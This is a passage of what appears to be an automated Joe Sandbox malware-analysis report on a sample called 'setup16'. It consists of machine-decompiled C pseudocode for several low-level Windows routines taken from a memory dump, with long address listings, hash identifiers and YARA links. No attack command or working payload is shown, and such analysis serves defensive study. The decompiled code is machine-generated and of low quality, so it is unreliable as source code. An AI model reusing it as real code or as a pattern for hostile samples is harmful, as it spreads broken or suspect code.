								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L049E77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04A09650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                                                                                                                                                        0x049cc608
                                                                                                                                                                                                        0x049cc615
                                                                                                                                                                                                        0x049cc625
                                                                                                                                                                                                        0x049cc62d
                                                                                                                                                                                                        0x049cc635
                                                                                                                                                                                                        0x049cc640
                                                                                                                                                                                                        0x049cc680
                                                                                                                                                                                                        0x049cc687
                                                                                                                                                                                                        0x049cc688
                                                                                                                                                                                                        0x049cc689
                                                                                                                                                                                                        0x049cc694
                                                                                                                                                                                                        0x049cc694
                                                                                                                                                                                                        0x049cc642
                                                                                                                                                                                                        0x049cc64a
                                                                                                                                                                                                        0x049cc697
                                                                                                                                                                                                        0x04a37a25
                                                                                                                                                                                                        0x04a37a2b
                                                                                                                                                                                                        0x04a37a2e
                                                                                                                                                                                                        0x04a37a30
                                                                                                                                                                                                        0x04a37bea
                                                                                                                                                                                                        0x04a37bea
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37bea
                                                                                                                                                                                                        0x04a37a36
                                                                                                                                                                                                        0x04a37a43
                                                                                                                                                                                                        0x04a37a48
                                                                                                                                                                                                        0x04a37a4c
                                                                                                                                                                                                        0x04a37a4e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37a58
                                                                                                                                                                                                        0x04a37a5a
                                                                                                                                                                                                        0x04a37a5b
                                                                                                                                                                                                        0x04a37a5c
                                                                                                                                                                                                        0x04a37a5d
                                                                                                                                                                                                        0x04a37a63
                                                                                                                                                                                                        0x04a37a64
                                                                                                                                                                                                        0x04a37a6a
                                                                                                                                                                                                        0x04a37a6c
                                                                                                                                                                                                        0x04a37a6e
                                                                                                                                                                                                        0x04a379cb
                                                                                                                                                                                                        0x04a379cb
                                                                                                                                                                                                        0x04a379ce
                                                                                                                                                                                                        0x04a379d0
                                                                                                                                                                                                        0x04a37a98
                                                                                                                                                                                                        0x04a37a9b
                                                                                                                                                                                                        0x04a37a9b
                                                                                                                                                                                                        0x04a37a9e
                                                                                                                                                                                                        0x04a37aa1
                                                                                                                                                                                                        0x04a37bbe
                                                                                                                                                                                                        0x04a37bbe
                                                                                                                                                                                                        0x04a37bc0
                                                                                                                                                                                                        0x04a37be0
                                                                                                                                                                                                        0x04a37be0
                                                                                                                                                                                                        0x04a37a01
                                                                                                                                                                                                        0x04a37a01
                                                                                                                                                                                                        0x04a37a05
                                                                                                                                                                                                        0x04a37a07
                                                                                                                                                                                                        0x04a37a15
                                                                                                                                                                                                        0x04a37a15
                                                                                                                                                                                                        0x04a37a1a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37a1a
                                                                                                                                                                                                        0x04a37bc2
                                                                                                                                                                                                        0x04a37bc6
                                                                                                                                                                                                        0x04a37bc9
                                                                                                                                                                                                        0x04a37bcd
                                                                                                                                                                                                        0x04a37bcf
                                                                                                                                                                                                        0x04a379e6
                                                                                                                                                                                                        0x04a379e6
                                                                                                                                                                                                        0x04a379eb
                                                                                                                                                                                                        0x04a379eb
                                                                                                                                                                                                        0x04a379ef
                                                                                                                                                                                                        0x04a379f1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a379f3
                                                                                                                                                                                                        0x04a379f5
                                                                                                                                                                                                        0x04a379ff
                                                                                                                                                                                                        0x04a379ff
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a379ff
                                                                                                                                                                                                        0x04a379f7
                                                                                                                                                                                                        0x04a379fd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a379fd
                                                                                                                                                                                                        0x04a37bd5
                                                                                                                                                                                                        0x04a37bd8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37ba9
                                                                                                                                                                                                        0x04a37bac
                                                                                                                                                                                                        0x04a37bb0
                                                                                                                                                                                                        0x04a37bb1
                                                                                                                                                                                                        0x04a37bb1
                                                                                                                                                                                                        0x04a37bb6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37bb6
                                                                                                                                                                                                        0x04a37aa7
                                                                                                                                                                                                        0x04a37aaa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37ab2
                                                                                                                                                                                                        0x04a37ab3
                                                                                                                                                                                                        0x04a37ab5
                                                                                                                                                                                                        0x04a37aec
                                                                                                                                                                                                        0x04a37aef
                                                                                                                                                                                                        0x04a37b25
                                                                                                                                                                                                        0x04a37b28
                                                                                                                                                                                                        0x04a37b62
                                                                                                                                                                                                        0x04a37b64
                                                                                                                                                                                                        0x04a37b8f
                                                                                                                                                                                                        0x04a37b92
                                                                                                                                                                                                        0x04a37b96
                                                                                                                                                                                                        0x04a37b98
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37b9e
                                                                                                                                                                                                        0x04a37b9f
                                                                                                                                                                                                        0x04a37ba3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37ba3
                                                                                                                                                                                                        0x04a37b66
                                                                                                                                                                                                        0x04a37b68
                                                                                                                                                                                                        0x04a37ae2
                                                                                                                                                                                                        0x04a37ae2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37ae2
                                                                                                                                                                                                        0x04a37b6e
                                                                                                                                                                                                        0x04a37b72
                                                                                                                                                                                                        0x04a37b75
                                                                                                                                                                                                        0x04a37b81
                                                                                                                                                                                                        0x04a37b85
                                                                                                                                                                                                        0x04a37b87
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37b31
                                                                                                                                                                                                        0x04a37b34
                                                                                                                                                                                                        0x04a37b3c
                                                                                                                                                                                                        0x04a37b45
                                                                                                                                                                                                        0x04a37b46
                                                                                                                                                                                                        0x04a37b4f
                                                                                                                                                                                                        0x04a37b51
                                                                                                                                                                                                        0x04a37b57
                                                                                                                                                                                                        0x04a37b59
                                                                                                                                                                                                        0x04a37b59
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37b59
                                                                                                                                                                                                        0x04a37b77
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37b77
                                                                                                                                                                                                        0x04a37b2a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37b2a
                                                                                                                                                                                                        0x04a37af1
                                                                                                                                                                                                        0x04a37af3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37afb
                                                                                                                                                                                                        0x04a37afc
                                                                                                                                                                                                        0x04a37afe
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37b00
                                                                                                                                                                                                        0x04a37b03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37b05
                                                                                                                                                                                                        0x04a37b09
                                                                                                                                                                                                        0x04a37b0d
                                                                                                                                                                                                        0x04a37b0f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37b18
                                                                                                                                                                                                        0x04a37b1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37b1d
                                                                                                                                                                                                        0x04a37ab7
                                                                                                                                                                                                        0x04a37ab9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37abf
                                                                                                                                                                                                        0x04a37ac1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37ac3
                                                                                                                                                                                                        0x04a37ac6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37ac8
                                                                                                                                                                                                        0x04a37acc
                                                                                                                                                                                                        0x04a37ad0
                                                                                                                                                                                                        0x04a37ad2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37adb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37adb
                                                                                                                                                                                                        0x04a379d6
                                                                                                                                                                                                        0x04a379d9
                                                                                                                                                                                                        0x04a379dc
                                                                                                                                                                                                        0x04a37a91
                                                                                                                                                                                                        0x04a37a94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37a94
                                                                                                                                                                                                        0x04a379e2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a379e2
                                                                                                                                                                                                        0x04a37a74
                                                                                                                                                                                                        0x04a37a7a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37a8a
                                                                                                                                                                                                        0x04a37a21
                                                                                                                                                                                                        0x04a37a21
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37a21
                                                                                                                                                                                                        0x049cc650
                                                                                                                                                                                                        0x049cc651
                                                                                                                                                                                                        0x049cc656
                                                                                                                                                                                                        0x049cc65c
                                                                                                                                                                                                        0x049cc65d
                                                                                                                                                                                                        0x049cc663
                                                                                                                                                                                                        0x049cc664
                                                                                                                                                                                                        0x049cc66a
                                                                                                                                                                                                        0x049cc66e
                                                                                                                                                                                                        0x04a379c5
                                                                                                                                                                                                        0x04a379c7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a379c7
                                                                                                                                                                                                        0x049cc67a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: ee562315154760981f6825e137ad54500b09e44df64c2cd6ab1dd1efa9d2edd5
                                                                                                                                                                                                        • Instruction ID: a52a48cc843b134b921df2ff53638b337dc1607e5d9ed4d89d4b43e182110fac
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee562315154760981f6825e137ad54500b09e44df64c2cd6ab1dd1efa9d2edd5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2817EBDA442029FDB25CF14C880A7AB7A5EB84355F54C96AFD469B640F330FD41CBA2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A5B8D0 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 39%
                                                                                                                                                                                                        			E04A5B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4ab7b9c; // 0x0
				_t124 = L049E4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04A09800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E04A095B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E04A095D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L049E77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04A09910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E04A095D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4ab7b9c; // 0x0
									_t92 = L049E4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04A09910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E049CA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E04A5E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E04A5E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E04A095B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                                                                                                                                        0x04a5b8d9
                                                                                                                                                                                                        0x04a5b8e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5b8e6
                                                                                                                                                                                                        0x04a5b8f3
                                                                                                                                                                                                        0x04a5b8f5
                                                                                                                                                                                                        0x04a5b8f5
                                                                                                                                                                                                        0x04a5b8f8
                                                                                                                                                                                                        0x04a5b920
                                                                                                                                                                                                        0x04a5b924
                                                                                                                                                                                                        0x04a5b936
                                                                                                                                                                                                        0x04a5b939
                                                                                                                                                                                                        0x04a5b93d
                                                                                                                                                                                                        0x04a5b948
                                                                                                                                                                                                        0x04a5b9a0
                                                                                                                                                                                                        0x04a5b9a0
                                                                                                                                                                                                        0x04a5b9a4
                                                                                                                                                                                                        0x04a5b9bf
                                                                                                                                                                                                        0x04a5b9c4
                                                                                                                                                                                                        0x04a5b9c6
                                                                                                                                                                                                        0x04a5b9cd
                                                                                                                                                                                                        0x04a5b9d1
                                                                                                                                                                                                        0x04a5bad4
                                                                                                                                                                                                        0x04a5bad8
                                                                                                                                                                                                        0x04a5bada
                                                                                                                                                                                                        0x04a5badc
                                                                                                                                                                                                        0x04a5badc
                                                                                                                                                                                                        0x04a5badf
                                                                                                                                                                                                        0x04a5bae0
                                                                                                                                                                                                        0x04a5bae2
                                                                                                                                                                                                        0x04a5bae4
                                                                                                                                                                                                        0x04a5baec
                                                                                                                                                                                                        0x04a5baee
                                                                                                                                                                                                        0x04a5baf0
                                                                                                                                                                                                        0x04a5baf0
                                                                                                                                                                                                        0x04a5baec
                                                                                                                                                                                                        0x04a5bafb
                                                                                                                                                                                                        0x04a5bafc
                                                                                                                                                                                                        0x04a5bafe
                                                                                                                                                                                                        0x04a5bb01
                                                                                                                                                                                                        0x04a5bb01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5bb06
                                                                                                                                                                                                        0x04a5b9d7
                                                                                                                                                                                                        0x04a5b9db
                                                                                                                                                                                                        0x04a5b9db
                                                                                                                                                                                                        0x04a5b9de
                                                                                                                                                                                                        0x04a5b9de
                                                                                                                                                                                                        0x04a5b9e4
                                                                                                                                                                                                        0x04a5b9e7
                                                                                                                                                                                                        0x04a5b9ea
                                                                                                                                                                                                        0x04a5b9ec
                                                                                                                                                                                                        0x04a5b9ef
                                                                                                                                                                                                        0x04a5b9f3
                                                                                                                                                                                                        0x04a5ba1b
                                                                                                                                                                                                        0x04a5ba1b
                                                                                                                                                                                                        0x04a5ba23
                                                                                                                                                                                                        0x04a5ba24
                                                                                                                                                                                                        0x04a5ba27
                                                                                                                                                                                                        0x04a5ba2a
                                                                                                                                                                                                        0x04a5ba2b
                                                                                                                                                                                                        0x04a5ba2e
                                                                                                                                                                                                        0x04a5ba30
                                                                                                                                                                                                        0x04a5ba37
                                                                                                                                                                                                        0x04a5ba3f
                                                                                                                                                                                                        0x04a5ba9c
                                                                                                                                                                                                        0x04a5baa2
                                                                                                                                                                                                        0x04a5bb13
                                                                                                                                                                                                        0x04a5bb15
                                                                                                                                                                                                        0x04a5baae
                                                                                                                                                                                                        0x04a5baae
                                                                                                                                                                                                        0x04a5bab3
                                                                                                                                                                                                        0x04a5bab5
                                                                                                                                                                                                        0x04a5baba
                                                                                                                                                                                                        0x04a5bac8
                                                                                                                                                                                                        0x04a5bac8
                                                                                                                                                                                                        0x04a5baba
                                                                                                                                                                                                        0x04a5bacd
                                                                                                                                                                                                        0x04a5bacf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5bacf
                                                                                                                                                                                                        0x04a5bb1a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5bb1c
                                                                                                                                                                                                        0x04a5baa7
                                                                                                                                                                                                        0x04a5bb11
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5bb11
                                                                                                                                                                                                        0x04a5baa9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5ba41
                                                                                                                                                                                                        0x04a5ba41
                                                                                                                                                                                                        0x04a5ba41
                                                                                                                                                                                                        0x04a5ba58
                                                                                                                                                                                                        0x04a5ba5d
                                                                                                                                                                                                        0x04a5ba62
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5ba64
                                                                                                                                                                                                        0x04a5ba67
                                                                                                                                                                                                        0x04a5ba68
                                                                                                                                                                                                        0x04a5ba69
                                                                                                                                                                                                        0x04a5ba6c
                                                                                                                                                                                                        0x04a5ba6f
                                                                                                                                                                                                        0x04a5ba71
                                                                                                                                                                                                        0x04a5ba78
                                                                                                                                                                                                        0x04a5ba80
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5ba90
                                                                                                                                                                                                        0x04a5ba90
                                                                                                                                                                                                        0x04a5ba97
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5ba97
                                                                                                                                                                                                        0x04a5b9f5
                                                                                                                                                                                                        0x04a5b9f7
                                                                                                                                                                                                        0x04a5b9f7
                                                                                                                                                                                                        0x04a5b9fa
                                                                                                                                                                                                        0x04a5ba03
                                                                                                                                                                                                        0x04a5ba07
                                                                                                                                                                                                        0x04a5ba0c
                                                                                                                                                                                                        0x04a5ba10
                                                                                                                                                                                                        0x04a5ba17
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5b9f7
                                                                                                                                                                                                        0x04a5b9a6
                                                                                                                                                                                                        0x04a5b9a8
                                                                                                                                                                                                        0x04a5b9af
                                                                                                                                                                                                        0x04a5b9b3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5b9b9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5b9b9
                                                                                                                                                                                                        0x04a5b94d
                                                                                                                                                                                                        0x04a5b98f
                                                                                                                                                                                                        0x04a5b995
                                                                                                                                                                                                        0x04a5b999
                                                                                                                                                                                                        0x04a5b960
                                                                                                                                                                                                        0x04a5b967
                                                                                                                                                                                                        0x04a5b968
                                                                                                                                                                                                        0x04a5b96a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5b96a
                                                                                                                                                                                                        0x04a5b99b
                                                                                                                                                                                                        0x04a5b99e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5b99e
                                                                                                                                                                                                        0x04a5b951
                                                                                                                                                                                                        0x04a5b954
                                                                                                                                                                                                        0x04a5b95a
                                                                                                                                                                                                        0x04a5b95e
                                                                                                                                                                                                        0x04a5b972
                                                                                                                                                                                                        0x04a5b979
                                                                                                                                                                                                        0x04a5b97d
                                                                                                                                                                                                        0x04a5b97f
                                                                                                                                                                                                        0x04a5b980
                                                                                                                                                                                                        0x04a5b982
                                                                                                                                                                                                        0x04a5b984
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5b984
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5b926
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a5b926

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 69d2333fc21ec206455123b668a06743056292564e76e01f0375f014a2dab82c
                                                                                                                                                                                                        • Instruction ID: c5742fc23c1a6491edae100504f6b98cb95d904dc0fb9b9c660a58bf474838b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69d2333fc21ec206455123b668a06743056292564e76e01f0375f014a2dab82c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74711072200701EFE7328F25CA41F66B7B5EB84725F118928EA558B2F1EB71F940CB60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A46DC9 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                                                        			E04A46DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L049E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04A46B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E049E7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04A09AE0();
					_t87 = L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E04A4795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E04A4795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E04A4795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E04A4795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L049E4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04A46B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04A46B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04A46B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04A46B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E049E7D50() != 0) {
